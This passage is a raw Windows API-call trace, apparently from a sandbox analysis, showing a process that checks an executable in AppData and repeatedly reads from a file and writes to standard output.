GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0216.869] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.870] GetFileType (hFile=0x50) returned 0x1 [0216.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.870] GetFileType (hFile=0x50) returned 0x1 [0216.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.870] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.871] GetFileType (hFile=0x50) returned 0x1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.871] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.871] GetFileType (hFile=0x50) returned 0x1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.871] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: 
lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.872] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.872] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.872] GetFileType (hFile=0x50) returned 0x1 [0216.872] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0216.872] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.873] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.873] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 
[0216.874] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.874] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.874] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 
[0216.874] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.874] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] GetFileType (hFile=0x50) returned 0x1 [0216.875] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.875] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.875] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0216.875] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.876] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.876] GetFileType (hFile=0x50) returned 0x1 [0216.876] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.877] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.877] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType 
(hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.877] GetFileType (hFile=0x50) returned 0x1 [0216.877] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.878] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.878] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, 
lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.878] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, 
lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.879] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.879] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.879] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, 
lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] GetFileType (hFile=0x50) returned 0x1 [0216.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.880] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.880] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.881] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.881] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.881] GetFileType (hFile=0x50) returned 0x1 [0216.881] _get_osfhandle 
